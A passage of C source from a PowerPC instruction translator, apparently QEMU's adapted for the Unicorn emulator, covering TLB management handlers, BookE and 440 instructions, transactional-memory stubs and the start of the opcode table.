tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); break; case 1: gen_helper_4xx_tlbre_lo(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* tlbsx - tlbsx. */ static void gen_tlbsx_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_4xx_tlbsx(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (Rc(ctx->opcode)) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rD(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], 0x02); gen_set_label(tcg_ctx, l1); } } /* tlbwe */ static void gen_tlbwe_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: gen_helper_4xx_tlbwe_hi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); break; case 1: gen_helper_4xx_tlbwe_lo(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* TLB management - PowerPC 440 implementation */ /* tlbre */ static void gen_tlbre_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: case 1: case 2: { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_helper_440_tlbre(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0, cpu_gpr[rA(ctx->opcode)]); tcg_temp_free_i32(tcg_ctx, t0); } break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* tlbsx - tlbsx. */ static void gen_tlbsx_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_440_tlbsx(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (Rc(ctx->opcode)) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rD(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], 0x02); gen_set_label(tcg_ctx, l1); } } /* tlbwe */ static void gen_tlbwe_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: case 1: case 2: { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_helper_440_tlbwe(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); tcg_temp_free_i32(tcg_ctx, t0); } break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* TLB management - PowerPC BookE 2.06 implementation */ /* tlbre */ static void gen_tlbre_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_booke206_tlbre(tcg_ctx, tcg_ctx->cpu_env); } /* tlbsx - tlbsx. */ static void gen_tlbsx_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; if (rA(ctx->opcode)) { t0 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, t0, cpu_gpr[rD(ctx->opcode)]); } else { t0 = tcg_const_tl(tcg_ctx, 0); } tcg_gen_add_tl(tcg_ctx, t0, t0, cpu_gpr[rB(ctx->opcode)]); gen_helper_booke206_tlbsx(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* tlbwe */ static void gen_tlbwe_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_booke206_tlbwe(tcg_ctx, tcg_ctx->cpu_env); } static void gen_tlbivax_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_booke206_tlbivax(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } static void gen_tlbilx_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); switch ((ctx->opcode >> 21) & 0x3) { case 0: gen_helper_booke206_tlbilx0(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 1: gen_helper_booke206_tlbilx1(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 3: gen_helper_booke206_tlbilx3(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } tcg_temp_free(tcg_ctx, t0); } /* wrtee */ static void gen_wrtee(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rD(ctx->opcode)], (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, cpu_msr, cpu_msr, ~(1 << MSR_EE)); tcg_gen_or_tl(tcg_ctx, cpu_msr, cpu_msr, t0); tcg_temp_free(tcg_ctx, t0); /* * Stop translation to have a chance to raise an exception if we * just set msr_ee to 1 */ gen_stop_exception(ctx); } /* wrteei */ static void gen_wrteei(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (ctx->opcode & 0x00008000) { tcg_gen_ori_tl(tcg_ctx, cpu_msr, cpu_msr, (1 << MSR_EE)); /* Stop translation to have a chance to raise an exception */ gen_stop_exception(ctx); } else { tcg_gen_andi_tl(tcg_ctx, cpu_msr, cpu_msr, ~(1 << MSR_EE)); } } /* PowerPC 440 specific instructions */ /* dlmzb */ static void gen_dlmzb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, Rc(ctx->opcode)); gen_helper_dlmzb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* mbar replaces eieio on 440 */ static void gen_mbar(DisasContext *ctx) { /* interpreted as no-op */ } /* msync replaces sync on 440 */ static void gen_msync_4xx(DisasContext *ctx) { /* Only e500 seems to treat reserved bits as invalid */ if ((ctx->insns_flags2 & PPC2_BOOKE206) && (ctx->opcode & 0x03FFF801)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* otherwise interpreted as no-op */ } /* icbt */ static void gen_icbt_440(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* Embedded.Processor Control */ static void gen_msgclr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; if (is_book3s_arch2x(ctx)) { gen_helper_book3s_msgclr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } else { gen_helper_msgclr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } } static void gen_msgsnd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; if (is_book3s_arch2x(ctx)) { gen_helper_book3s_msgsnd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } else { gen_helper_msgsnd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } } #if defined(TARGET_PPC64) static void gen_msgclrp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_book3s_msgclrp(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_msgsndp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_book3s_msgsndp(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } #endif static void gen_msgsync(DisasContext *ctx) { CHK_HV; /* interpreted as no-op */ } #if defined(TARGET_PPC64) static void gen_maddld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_add_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1, cpu_gpr[rC(ctx->opcode)]); tcg_temp_free_i64(tcg_ctx, t1); } /* maddhd maddhdu */ static void gen_maddhd_maddhdu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 lo = tcg_temp_new_i64(tcg_ctx); TCGv_i64 hi = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); if (Rc(ctx->opcode)) { tcg_gen_mulu2_i64(tcg_ctx, lo, hi, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_movi_i64(tcg_ctx, t1, 0); } else { tcg_gen_muls2_i64(tcg_ctx, lo, hi, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_sari_i64(tcg_ctx, t1, cpu_gpr[rC(ctx->opcode)], 63); } tcg_gen_add2_i64(tcg_ctx, t1, cpu_gpr[rD(ctx->opcode)], lo, hi, cpu_gpr[rC(ctx->opcode)], t1); tcg_temp_free_i64(tcg_ctx, lo); tcg_temp_free_i64(tcg_ctx, hi); tcg_temp_free_i64(tcg_ctx, t1); } #endif /* defined(TARGET_PPC64) */ static void gen_tbegin(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->tm_enabled)) { gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); return; } gen_helper_tbegin(tcg_ctx, tcg_ctx->cpu_env); } #define GEN_TM_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->tm_enabled)) { \ gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); \ return; \ } \ /* \ * Because tbegin always fails in QEMU, these user \ * space instructions all have a simple implementation: \ * \ * CR[0] = 0b0 || MSR[TS] || 0b0 \ * = 0b0 || 0b00 || 0b0 \ */ \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[0], 0); \ } GEN_TM_NOOP(tend); GEN_TM_NOOP(tabort); GEN_TM_NOOP(tabortwc); GEN_TM_NOOP(tabortwci); GEN_TM_NOOP(tabortdc); GEN_TM_NOOP(tabortdci); GEN_TM_NOOP(tsr); static inline void gen_cp_abort(DisasContext *ctx) { /* Do Nothing */ } #define GEN_CP_PASTE_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ /* \ * Generate invalid exception until we have an \ * implementation of the copy paste facility \ */ \ gen_invalid(ctx); \ } GEN_CP_PASTE_NOOP(copy) GEN_CP_PASTE_NOOP(paste) static void gen_tcheck(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->tm_enabled)) { gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); return; } /* * Because tbegin always fails, the tcheck implementation is * simple: * * CR[CRF] = TDOOMED || MSR[TS] || 0b0 * = 0b1 || 0b00 || 0b0 */ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], 0x8); } #define GEN_TM_PRIV_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ CHK_SV; \ if (unlikely(!ctx->tm_enabled)) { \ gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); \ return; \ } \ /* \ * Because tbegin always fails, the implementation is \ * simple: \ * \ * CR[0] = 0b0 || MSR[TS] || 0b0 \ * = 0b0 || 0b00 | 0b0 \ */ \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[0], 0); \ } GEN_TM_PRIV_NOOP(treclaim); GEN_TM_PRIV_NOOP(trechkpt); static inline void get_fpr(TCGContext *tcg_ctx, TCGv_i64 dst, int regno) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, fpr_offset(regno)); } static inline void set_fpr(TCGContext *tcg_ctx, int regno, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, fpr_offset(regno)); } static inline void get_avr64(TCGContext *tcg_ctx, TCGv_i64 dst, int regno, bool high) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, avr64_offset(regno, high)); } static inline void set_avr64(TCGContext *tcg_ctx, int regno, TCGv_i64 src, bool high) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, avr64_offset(regno, high)); } #include "translate/fp-impl.inc.c" #include "translate/vmx-impl.inc.c" #include "translate/vsx-impl.inc.c" #include "translate/dfp-impl.inc.c" #include "translate/spe-impl.inc.c" /* Handles lfdp, lxsd, lxssp */ static void gen_dform39(DisasContext *ctx) { switch (ctx->opcode & 0x3) { case 0: /* lfdp */ if (ctx->insns_flags2 & PPC2_ISA205) { return gen_lfdp(ctx); } break; case 2: /* lxsd */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxsd(ctx); } break; case 3: /* lxssp */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxssp(ctx); } break; } return gen_invalid(ctx); } /* handles stfdp, lxv, stxsd, stxssp lxvx */ static void gen_dform3D(DisasContext *ctx) { if ((ctx->opcode & 3) == 1) { /* DQ-FORM */ switch (ctx->opcode & 0x7) { case 1: /* lxv */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxv(ctx); } break; case 5: /* stxv */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxv(ctx); } break; } } else { /* DS-FORM */ switch (ctx->opcode & 0x3) { case 0: /* stfdp */ if (ctx->insns_flags2 & PPC2_ISA205) { return gen_stfdp(ctx); } break; case 2: /* stxsd */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxsd(ctx); } break; case 3: /* stxssp */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxssp(ctx); } break; } } return gen_invalid(ctx); } static opcode_t opcodes[] = { GEN_HANDLER(invalid, 0x00, 0x00, 0x00, 0xFFFFFFFF, PPC_NONE), GEN_HANDLER(cmp, 0x1F, 0x00, 0x00, 0x00400000, PPC_INTEGER), GEN_HANDLER(cmpi, 0x0B, 0xFF, 0xFF, 0x00400000, PPC_INTEGER), GEN_HANDLER(cmpl, 0x1F, 0x00, 0x01, 0x00400001, PPC_INTEGER), GEN_HANDLER(cmpli, 0x0A, 0xFF, 0xFF, 0x00400000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER_E(cmpeqb, 0x1F, 0x00, 0x07, 0x00600000, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(cmpb, 0x1F, 0x1C, 0x0F, 0x00000001, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(cmprb, 0x1F, 0x00, 0x06, 0x00400001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(isel, 0x1F, 0x0F, 0xFF, 0x00000001, PPC_ISEL), GEN_HANDLER(addi, 0x0E, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(addic, 0x0C, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(addic_, "addic.", 0x0D, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(addis, 0x0F, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER_E(addpcis, 0x13, 0x2, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER(mulhw, 0x1F, 0x0B, 0x02, 0x00000400, PPC_INTEGER), GEN_HANDLER(mulhwu, 0x1F, 0x0B, 0x00, 0x00000400, PPC_INTEGER), GEN_HANDLER(mullw, 0x1F, 0x0B, 0x07, 0x00000000, PPC_INTEGER), GEN_HANDLER(mullwo, 0x1F, 0x0B, 0x17, 0x00000000, PPC_INTEGER), GEN_HANDLER(mulli, 0x07, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER(mulld, 0x1F, 0x09, 0x07, 0x00000000, PPC_64B), #endif GEN_HANDLER(neg, 0x1F, 0x08, 0x03, 0x0000F800, PPC_INTEGER), GEN_HANDLER(nego, 0x1F, 0x08, 0x13, 0x0000F800, PPC_INTEGER), GEN_HANDLER(subfic, 0x08, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(andi_, "andi.", 0x1C, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(andis_, "andis.", 0x1D, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(cntlzw, 0x1F, 0x1A, 0x00, 0x00000000, PPC_INTEGER), GEN_HANDLER_E(cnttzw, 0x1F, 0x1A, 0x10, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(copy, 0x1F, 0x06, 0x18, 0x03C00001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(cp_abort, 0x1F, 0x06, 0x1A, 0x03FFF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(paste, 0x1F, 0x06, 0x1C, 0x03C00000, PPC_NONE, PPC2_ISA300), GEN_HANDLER(or, 0x1F, 0x1C, 0x0D, 0x00000000, PPC_INTEGER), GEN_HANDLER(xor, 0x1F, 0x1C, 0x09, 0x00000000, PPC_INTEGER), GEN_HANDLER(ori, 0x18, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(oris, 0x19, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(xori, 0x1A, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(xoris, 0x1B, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(popcntb, 0x1F, 0x1A, 0x03, 0x0000F801, PPC_POPCNTB), GEN_HANDLER(popcntw, 0x1F, 0x1A, 0x0b, 0x0000F801, PPC_POPCNTWD), GEN_HANDLER_E(prtyw, 0x1F, 0x1A, 0x04, 0x0000F801, PPC_NONE, PPC2_ISA205), #if defined(TARGET_PPC64) GEN_HANDLER(popcntd, 0x1F, 0x1A, 0x0F, 0x0000F801, PPC_POPCNTWD), GEN_HANDLER(cntlzd, 0x1F, 0x1A, 0x01, 0x00000000, PPC_64B), GEN_HANDLER_E(cnttzd, 0x1F, 0x1A, 0x11, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(darn, 0x1F, 0x13, 0x17, 0x001CF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(prtyd, 0x1F, 0x1A, 0x05, 0x0000F801, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(bpermd, 0x1F, 0x1C, 0x07, 0x00000001, PPC_NONE, PPC2_PERM_ISA206), #endif GEN_HANDLER(rlwimi, 0x14, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(rlwinm, 0x15, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(rlwnm, 0x17, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(slw, 0x1F, 0x18, 0x00, 0x00000000, PPC_INTEGER), GEN_HANDLER(sraw, 0x1F, 0x18, 0x18, 0x00000000, PPC_INTEGER), GEN_HANDLER(srawi, 0x1F, 0x18, 0x19, 0x00000000, PPC_INTEGER), GEN_HANDLER(srw, 0x1F, 0x18, 0x10, 0x00000000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER(sld, 0x1F, 0x1B, 0x00, 0x00000000, PPC_64B), GEN_HANDLER(srad, 0x1F, 0x1A, 0x18, 0x00000000, PPC_64B), GEN_HANDLER2(sradi0, "sradi", 0x1F, 0x1A, 0x19, 0x00000000, PPC_64B), GEN_HANDLER2(sradi1, "sradi", 0x1F, 0x1B, 0x19, 0x00000000, PPC_64B), GEN_HANDLER(srd, 0x1F, 0x1B, 0x10, 0x00000000, PPC_64B), GEN_HANDLER2_E(extswsli0, "extswsli", 0x1F, 0x1A, 0x1B, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER2_E(extswsli1, "extswsli", 0x1F, 0x1B, 0x1B, 0x00000000, PPC_NONE, PPC2_ISA300), #endif #if defined(TARGET_PPC64) GEN_HANDLER(ld, 0x3A, 0xFF, 0xFF, 0x00000000, PPC_64B), GEN_HANDLER(lq, 0x38, 0xFF, 0xFF, 0x00000000, PPC_64BX), GEN_HANDLER(std, 0x3E, 0xFF, 0xFF, 0x00000000, PPC_64B), #endif /* handles lfdp, lxsd, lxssp */ GEN_HANDLER_E(dform39, 0x39, 0xFF, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA205), /* handles stfdp, lxv, stxsd, stxssp, stxv */ GEN_HANDLER_E(dform3D, 0x3D, 0xFF, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA205), GEN_HANDLER(lmw, 0x2E, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(stmw, 0x2F, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(lswi, 0x1F, 0x15, 0x12, 0x00000001, PPC_STRING), GEN_HANDLER(lswx, 0x1F, 0x15, 0x10, 0x00000001, PPC_STRING), GEN_HANDLER(stswi, 0x1F, 0x15, 0x16, 0x00000001, PPC_STRING), GEN_HANDLER(stswx, 0x1F, 0x15, 0x14, 0x00000001, PPC_STRING), GEN_HANDLER(eieio, 0x1F, 0x16, 0x1A, 0x01FFF801, PPC_MEM_EIEIO), GEN_HANDLER(isync, 0x13, 0x16, 0x04, 0x03FFF801, PPC_MEM), GEN_HANDLER_E(lbarx, 0x1F, 0x14, 0x01, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER_E(lharx, 0x1F, 0x14, 0x03, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER(lwarx, 0x1F, 0x14, 0x00, 0x00000000, PPC_RES), GEN_HANDLER_E(lwat, 0x1F, 0x06, 0x12, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stwat, 0x1F, 0x06, 0x16, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stbcx_, 0x1F, 0x16, 0x15, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER_E(sthcx_, 0x1F, 0x16, 0x16, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER2(stwcx_, "stwcx.", 0x1F, 0x16, 0x04, 0x00000000, PPC_RES), #if defined(TARGET_PPC64) GEN_HANDLER_E(ldat, 0x1F, 0x06, 0x13, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stdat, 0x1F, 0x06, 0x17, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(ldarx, 0x1F, 0x14, 0x02, 0x00000000, PPC_64B), GEN_HANDLER_E(lqarx, 0x1F, 0x14, 0x08, 0, PPC_NONE, PPC2_LSQ_ISA207), GEN_HANDLER2(stdcx_, "stdcx.", 0x1F, 0x16, 0x06, 0x00000000, PPC_64B), GEN_HANDLER_E(stqcx_, 0x1F, 0x16, 0x05, 0, PPC_NONE, PPC2_LSQ_ISA207), #endif GEN_HANDLER(sync, 0x1F, 0x16, 0x12, 0x039FF801, PPC_MEM_SYNC), GEN_HANDLER(wait, 0x1F, 0x1E, 0x01, 0x03FFF801, PPC_WAIT), GEN_HANDLER_E(wait, 0x1F, 0x1E, 0x00, 0x039FF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER(b, 0x12, 0xFF, 0xFF, 0x00000000, PPC_FLOW), GEN_HANDLER(bc, 0x10, 0xFF, 0xFF, 0x00000000, PPC_FLOW), GEN_HANDLER(bcctr, 0x13, 0x10, 0x10, 0x00000000, PPC_FLOW), GEN_HANDLER(bclr, 0x13, 0x10, 0x00, 0x00000000, PPC_FLOW), GEN_HANDLER_E(bctar, 0x13, 0x10, 0x11, 0x0000E000, PPC_NONE, PPC2_BCTAR_ISA207), GEN_HANDLER(mcrf, 0x13, 0x00, 0xFF, 0x00000001, PPC_INTEGER), GEN_HANDLER(rfi, 0x13, 0x12, 0x01, 0x03FF8001, PPC_FLOW), #if defined(TARGET_PPC64) GEN_HANDLER(rfid, 0x13, 0x12, 0x00, 0x03FF8001, PPC_64B), GEN_HANDLER_E(stop, 0x13, 0x12, 0x0b, 0x03FFF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(doze, 0x13, 0x12, 0x0c, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(nap, 0x13, 0x12, 0x0d, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(sleep, 0x13, 0x12, 0x0e, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(rvwinkle, 0x13, 0x12, 0x0f, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER(hrfid, 0x13, 0x12, 0x08, 0x03FF8001, PPC_64H), #endif GEN_HANDLER(sc, 0x11, 0xFF, 0xFF, 0x03FFF01D, PPC_FLOW), GEN_HANDLER(tw, 0x1F, 0x04, 0x00, 0x00000001, PPC_FLOW), GEN_HANDLER(twi, 0x03, 0xFF, 0xFF, 0x00000000, PPC_FLOW), #if defined(TARGET_PPC64) GEN_HANDLER(td, 0x1F, 0x04, 0x02, 0x00000001, PPC_64B), GEN_HANDLER(tdi, 0x02, 0xFF, 0xFF, 0x00000000, PPC_64B), #endif GEN_HANDLER(mcrxr, 0x1F, 0x00, 0x10, 0x007FF801, PPC_MISC), GEN_HANDLER(mfcr, 0x1F, 0x13, 0x00, 0x00000801, PPC_MISC), GEN_HANDLER(mfmsr, 0x1F, 0x13, 0x02, 0x001FF801, PPC_MISC), GEN_HANDLER(mfspr, 0x1F, 0x13, 0x0A, 0x00000001, PPC_MISC), GEN_HANDLER(mftb, 0x1F, 0x13, 0x0B, 0x00000001, PPC_MFTB), GEN_HANDLER(mtcrf, 0x1F, 0x10, 0x04, 0x00000801, PPC_MISC), #if defined(TARGET_PPC64) GEN_HANDLER(mtmsrd, 0x1F, 0x12, 0x05, 0x001EF801, PPC_64B), GEN_HANDLER_E(setb, 0x1F, 0x00, 0x04, 0x0003F801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mcrxrx, 0x1F, 0x00, 0x12, 0x007FF801, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER(mtmsr, 0x1F, 0x12, 0x04, 0x001EF801, PPC_MISC), GEN_HANDLER(mtspr, 0x1F, 0x13, 0x0E, 0x00000000, PPC_MISC), GEN_HANDLER(dcbf, 0x1F, 0x16, 0x02, 0x03C00001, PPC_CACHE), GEN_HANDLER_E(dcbfep, 0x1F, 0x1F, 0x03, 0x03C00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbi, 0x1F, 0x16, 0x0E, 0x03E00001, PPC_CACHE), GEN_HANDLER(dcbst, 0x1F, 0x16, 0x01, 0x03E00001, PPC_CACHE), GEN_HANDLER_E(dcbstep, 0x1F, 0x1F, 0x01, 0x03E00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbt, 0x1F, 0x16, 0x08, 0x00000001, PPC_CACHE), GEN_HANDLER_E(dcbtep, 0x1F, 0x1F, 0x09, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbtst, 0x1F, 0x16, 0x07, 0x00000001, PPC_CACHE), GEN_HANDLER_E(dcbtstep, 0x1F, 0x1F, 0x07, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(dcbtls, 0x1F, 0x06, 0x05, 0x02000001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(dcbz, 0x1F, 0x16, 0x1F, 0x03C00001, PPC_CACHE_DCBZ), GEN_HANDLER_E(dcbzep, 0x1F, 0x1F, 0x1F, 0x03C00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dst, 0x1F, 0x16, 0x0A, 0x01800001, PPC_ALTIVEC), GEN_HANDLER(dstst, 0x1F, 0x16, 0x0B, 0x01800001, PPC_ALTIVEC), GEN_HANDLER(dss, 0x1F, 0x16, 0x19, 0x019FF801, 